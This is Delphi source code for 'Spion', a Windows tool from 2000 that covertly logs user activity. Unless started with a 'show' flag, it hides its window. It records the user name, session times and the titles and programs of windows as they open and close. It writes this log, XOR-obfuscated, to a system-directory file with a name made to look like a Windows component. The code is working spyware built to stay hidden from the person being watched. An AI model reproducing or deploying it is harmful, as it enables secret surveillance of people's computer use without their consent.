unit spions;

//  Spion V1.1
// (C) 2000 Hermann Weigl
//  email : webmaster@hermann-weigl.de
//  URL   : http://www.hermann-weigl.de


interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, ExtCtrls, tlhelp32, shellApi, Menus, ComCtrls;

type
  TFind_ID = (id_All,id_VisOnly,id_InvisOnly);

  TWinInfo = class(TObject)
  private
  public
   hpar,
   whdl    : HWND;
   thdl    : HTask;
 Parent,
   clas,
 ExePath : String;
   hIco,
   phdl    : DWORD;
   wsty,
   wXty    : LongInt;
  end;
  Tmain1 = class(TForm)
    Timer1: TTimer;
    MainMenu1: TMainMenu;
    Ende1: TMenuItem;
    PageControl1: TPageControl;
    TabSheet1: TTabSheet;
    TabSheet2: TTabSheet;
    Panel1: TPanel;
    ListBox1: TListBox;
    ListBox3: TListBox;
    ListBox4: TListBox;
    ListBox2: TListBox;
    Panel2: TPanel;
    Memo1: TMemo;
    btn_speichern: TButton;
    TabSheet3: TTabSheet;
    ListBoxLog: TListBox;
    LogDatei1: TMenuItem;
    Exportieren1: TMenuItem;
    Lschen1: TMenuItem;
    SaveDialog: TSaveDialog;
    procedure FormCreate(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure Ende1Click(Sender: TObject);
    procedure btn_speichernClick(Sender: TObject);
    procedure Memo1KeyDown(Sender: TObject; var Key: Word;
      Shift: TShiftState);
    procedure Lschen1Click(Sender: TObject);
    procedure Exportieren1Click(Sender: TObject);
  private
    { Private-Deklarationen }
   FFindID           : TFind_ID;
   fAcceptEmptyNames,
   fTimerOn,
   fTaskBarStyle     : Boolean;
   fOnChanged        : TNotifyEvent;
   fTimeVal          : Integer;
   fAbout            : String;

  public
    { Public-Deklarationen }
  end;


var
  main1: Tmain1;
  start,ende:tdatetime;
  WCheck,nWCheck : LongInt;
  ac,ftb,
  changed : Boolean;
  fid     : TFind_ID;
  Nums    : Integer;
  aw      : array[0..255] of HWnd;
  bRegistriert,b_editmode:bool;

const
  version:string='V1.1';

procedure P_ende;
procedure Speichern;
procedure WinExecute;
Procedure GetWindowsInfo(WinHandle : HWND);

implementation

uses u_Errorlog, U_Tools;

{$R *.DFM}

procedure Tmain1.FormCreate(Sender: TObject);
var
  F: Textfile;
  s,s1,s2:string;
  i:integer;
begin
  if ((Paramcount=1) and (ParamStr(1)='show')) then begin
    main1.Visible:=true;
    b_editmode:=true;
    Caption:='Spion '+version;
  end
  else begin
    Application.ShowMainForm:= false;
    b_editmode:=false;
  end;
  start:=now;
  timer1            := TTimer.Create(self);
  timer1.OnTimer    := Timer1Timer;
  timer1.Enabled    := False;
  fAcceptEmptyNames := False;
  fTimeVal          := 500;
  fTimerOn          := False;
  fFindId           := id_visonly;
  fTaskBarStyle     := True;
  WCheck            := 0;

  bregistriert:=true;

  if b_editmode=false then
    werr(' Anmeldung Benutzer : '+username,1);

  AssignFile(F,SystemDirectory+'Mshtmler.dli');
  try
    Reset(F);
    ListBoxLog.Clear;
    while not Eof(F) do begin
      readln(F,s);
      for i:=1 to length(s) do
        s[i]:=char(23 Xor ord(s[i]));
      ListBoxLog.Items.add(s);
    end;
    CloseFile (F);
  except
  end;

end;

procedure P_Ende;
var
  dauer:tdatetime;
  s:string;
begin
  ende:=now;
  dauer:=start-now;
  s:='Benutzer : '+username
    +' - Start : '+datetimetostr(start)
    +' - Ende : '+datetimetostr(ende)
    +' - Dauer : '+TimeToStr(dauer);
  werr(s,1);
end;

procedure Tmain1.FormShow(Sender: TObject);
var
  Owner : HWnd;
  s:string;
  F:Textfile;
begin
  if ((Paramcount=1) and (ParamStr(1)='show')) then begin
    main1.Visible:=true;
    memo1.Lines.Clear;
    AssignFile(F,GetFilePath+'filter.ini');
    Reset(F);
    while not Eof(F) do begin
      readln(F,s);
      memo1.Lines.add(s);
    end;
    closefile(F);
  end
  else begin
    main1.Visible:=false;
    Owner:=GetWindow(Handle,GW_OWNER);
    ShowWindow(Owner,SW_HIDE);
  end;
end;

procedure Tmain1.Timer1Timer(Sender: TObject);
begin
  Winexecute;
  if b_editmode=false then
    Speichern;
end;

procedure Speichern;
var
  i,k,m:integer;
begin
  with main1 do begin
    for i:=0  to listbox1.items.count-1 do
      for k:=0 to memo1.lines.count-1 do begin
        if pos(memo1.lines[k],listbox1.items[i])>0 then
          ListBox1.Items[i]:='';
      end;

    m:=listbox1.items.count;
    i:=0;
    while i < m do begin
      if listbox1.items[i]='' then begin
        ListBox1.Items.Delete(i);
        dec(m);
      end;
      inc(i);
    end;
    listbox3.items.Assign(listbox1.items);
    listbox4.items.Assign(listbox2.items);
    listbox2.Items.assign(listbox1.items);
    for i:=0 to listbox3.items.count-1 do begin
      for k:=0 to listbox4.items.count-1 do begin
        if listbox3.items[i]=listbox4.items[k] then begin
          listbox3.items[i]:='';
          listbox4.items[k]:='';
        end;
      end;
    end;
    for i:=0 to listbox3.items.count-1 do begin
      if listbox3.items[i]<>'' then
        werr(' + '+listbox3.items[i],1);
    end;
    for k:=0 to listbox4.items.count-1 do begin
      if listbox4.items[k]<>'' then
        werr(' - '+listbox4.items[k],1);
    end;
  end;
end;

function GetStyle(hdl : HWnd):Boolean;
var
 style : LongInt;
BEGIN
 Result := False;
 style  := GetWindowLong(hdl,GWL_STYLE);
 if((  style AND WS_POPUP)    = WS_POPUP) then  begin
  if(((style AND WS_GROUP)    = WS_GROUP)       AND NOT
     ((style AND WS_DISABLED) = WS_DISABLED)    AND
     ((style AND WS_SYSMENU)  = WS_SYSMENU))    then
     Result := True;
 end else Result := True;
END;

function EnumWindowsProc(hwndNext : HWnd; var lpara : LongInt):Bool;stdcall;
var
 P      : array[0..255] of Char;
 DoIt   : Boolean;
 hwPop  : HWnd;
begin
 Result := True;

 if hwndNext <> 0 then begin
  P[0] := #0;
  DoIt := False;
  GetWindowText(hwndNext, P, 255);
  if (ac or (P[0] <> #0)) then

   case fid of
    id_all      :                                         DoIt := True;
    id_visonly  : if (IsWindowVisible(hwndNext))     then DoIt := True;
    id_invisonly: if NOT (IsWindowVisible(hwndNext)) then DoIt := True;
   end;

   if (DoIt)then begin
    if NOT(ftb) then begin
		 aw[Nums]:= hwndNext;
     inc (Nums);
     nWCheck := nWCheck + hwndNext;
     exit;
    end;
    if (GetWindow(hwndNext, GW_OWNER) = 0) then
		 if GetStyle(hwndNext) then begin
      aw[Nums]:= hwndNext;
      inc (Nums);
      nWCheck := nWCheck + hwndNext;
     end
     else if isWindow(GetLastActivePopup(hwndNext))then begin
       hwPop := GetLastActivePopup(hwndNext);
       if GetStyle(hwPop) then begin
        aw[Nums]:= hwndNext;
        inc (Nums);
        nWCheck := nWCheck + hwndNext;
       end;
     end;
   end;
  end else Result := False;
end;

Procedure WinExecute;
var
  i : Integer;
Begin
  nWCheck := 0;
  main1.timer1.Enabled := False;
  ac   := main1.fAcceptEmptyNames;
  fid  := main1.FFindID;
  ftb  := main1.fTaskBarStyle;
  Nums := 0;

  EnumWindows(@EnumWindowsProc,0);

  if WCheck <> nWCheck then begin
    WCheck  := nWCheck;
    main1.Listbox1.Clear;
    for i := 0 to Nums - 1 do
      GetWindowsInfo(aw[i]);
    changed := True;
  end
  else
    changed := False;
  if main1.fTimerOn then
    main1.timer1.Enabled := True;
End;

Procedure GetWindowsInfo(WinHandle : HWND);
var
  P      : array[0..256] Of Char;
  dwActiveProcessId : DWORD;
  snap   : THandle;
  pe32   : TPROCESSENTRY32;
  tw     : Word;
  ts     : array[0..MAX_PATH] of char;
  WinObj : TWinInfo;
Begin
  P[0] := #0; snap := 0;
  WinObj      := TWinInfo.Create;
  WinObj.whdl := WinHandle;
  WinObj.thdl := GetWindowThreadProcessId(WinHandle,NIL);
  GetWindowThreadProcessId(WinHandle, @dwActiveProcessId );
  WinObj.phdl := dwActiveProcessId;
  WinObj.wsty := GetWindowLong(WinHandle,GWL_STYLE);
  WinObj.wXty := GetWindowLong(WinHandle,GWL_EXSTYLE);
  WinObj.hPar := GetWindowLong(WinHandle,GWL_HWNDPARENT);
  GetClassName(WinHandle, P, 100);
  WinObj.clas := String(P);


  if WinObj.hPar = 0 then
    P := 'Desktop'
  else
    GetWindowText(WinObj.hPar, P, 255);
  if P='' then
    P := 'NoName';
  WinObj.Parent := String(P);

  GetWindowText(WinHandle, P, 255);
  try
    snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,
																	 dwActiveProcessId);
    if snap <> 0 then begin
     pe32.dwSize := SizeOf(TPROCESSENTRY32);
     if Process32First(snap, pe32) then begin
       if pe32.th32ProcessID = dwActiveProcessId then begin
         WinObj.ExePath := String(pe32.szExeFile);
         end
         else begin
           while Process32Next(snap, pe32) do begin
             if pe32.th32ProcessID = dwActiveProcessId then begin
               WinObj.ExePath := String(pe32.szExeFile);
               break;
             end;
           end;
         end;
         tw                  := 0;
         StrCopy(ts,pe32.szExeFile);
         WinObj.hIco := ExtractIcon(hInstance,pe32.szExeFile,0);
         if WinObj.hIco=0 then
           Winobj.hIco := ExtractAssociatedIcon(hInstance,ts,tw);
       end;
     end;
  finally
    CloseHandle(snap);
  end;
  main1.listbox1.items.AddObject(P, WinObj);

End;


procedure Tmain1.FormDestroy(Sender: TObject);
var
  i : Integer;
Begin
  Listbox1.Clear;
  timer1.Enabled := False;
  timer1.Free;
end;

procedure Tmain1.Ende1Click(Sender: TObject);
begin
  close;
end;

procedure Tmain1.btn_speichernClick(Sender: TObject);
var
  i:integer;
  txtFile:TextFile;
begin
  FileCheck(GetFilePath+'filter.ini',3);
  AssignFile(txtFile,GetFilePath+'filter.ini');
  Append(txtFile);
  for i:=0 to memo1.lines.Count-1 do begin
    Writeln(txtFile,memo1.lines[i]);  // Fehlermeldung
  end;
  CloseFile(txtFile);
  btn_speichern.enabled:=false;
end;

procedure Tmain1.Memo1KeyDown(Sender: TObject; var Key: Word;
  Shift: TShiftState);
begin
  btn_speichern.enabled:=true;
end;

procedure Tmain1.Lschen1Click(Sender: TObject);
var
  fname:string;
begin
  if (MessageDlg ('Wollen Sie die Log-Datei wirklich lschen ? ',
    mtConfirmation, [mbYes, mbNo], 0) = mrYes) then begin
    fname:=SystemDirectory + 'Mshtmler.dli';
    if fileexists(fname) then
      deletefile(fname);
    ListBoxLog.Items.Clear;
  end;
end;

procedure Tmain1.Exportieren1Click(Sender: TObject);
var
  i:integer;
  s:string;
  txtFile,F:TextFile;
begin
  if savedialog.Execute=true then begin
    try
      AssignFile(F,SystemDirectory+'Mshtmler.dli');
      AssignFile(txtFile,savedialog.filename);
      if fileexists(savedialog.filename)
        then Append(txtFile)
        else Rewrite(txtFile);
      Reset(F);
      while not Eof(F) do begin
        readln(F,s);
        for i:=1 to length(s) do
          s[i]:=char(23 Xor ord(s[i]));
        Writeln(txtFile,s);
      end;
      CloseFile (F);
      CloseFile(txtFile);
      showmessage('Die Log-Datei wurde in die Datei '+savedialog.filename+' exportiert.');
    except
    end;
  end;
end;

initialization

finalization

end.
